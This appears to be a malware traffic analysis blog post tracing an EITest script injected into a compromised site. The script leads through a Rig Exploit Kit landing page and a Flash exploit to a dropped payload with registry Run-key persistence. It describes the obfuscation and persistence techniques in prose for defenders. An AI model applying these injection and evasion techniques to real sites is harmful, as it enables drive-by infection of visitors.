Below is a screenshot of the compromised site’s source code containing the injected EITest script:

The script is being obfuscated and hex encoded. Using the replace() method to replace all hyphens with percent signs removes the obfuscation and returns the hex encoded data. The hex encoded data is then decoded via the decodeURIComponent() function and then written to the document with the document.write() function. All this was likely added to the EITest script to help evade detection.

The purpose of the EITest script is to give the host instructions to download the EITest Flash file. Here is the GET request for that Flash file:

The EITest Flash file is followed by the host being redirected the EITest gate:

If you look at the <script> tag you will notice that there is a href containing the URL for the Rig Exploit Kit landing page. As you might have expected the host will then make a GET request for the Rig Exploit Kit landing page (shown below):

The file returned to the host is being obfuscated and encoded. As always, once on the landing page the host is fed instructions to make a request for an exploit. No surprise here but it was a Flash exploit:

After the Flash exploit is sent to the host we see the request for the payload:

The response from the server shows the content-type to be application/x-msdownload and the content-length to be 373248 Bytes in size. That equates to 364.5 KB. Now, we see an executable created in the user’s %TEMP% folder called “575y93oe5wa_1.exe”. That executable is 364.5 KB in size. I am not sure yet what this payload is but the POST requests to gate.php makes me think it could be Hancitor downloader callback traffic.

There were also 3 registry keys created with the name “CreativeAudio” and the data value being “C:\ProgramData\CreativeAudio\575y93oe5wa.exe”. The keys were in Run and RunOnce, shown below:

Following the payload delivered by Rig Exploit Kit server there were two GET requests for an executable named “rd927.exe,” 141312 Bytes in size (138 KB). Below is a GET request for that executable with the response showing “MZ” and “This program cannot be run in DOS mode”:

These two files were dropped in the user’s %TEMP% folder and were promptly self deleted. The names of the files can be seen below:

Once the computer is restarted the payload is removed from %TEMP%. The two registry RunOnce keys remain the same however the Run key pointing to C:\ProgramData\CreativeAudio\575y93oe5wa.exein via HKEY_CURRENT_USER is now gone.

As always I recommend blocking all the IPs listed in the IOCs section at the very top of this post.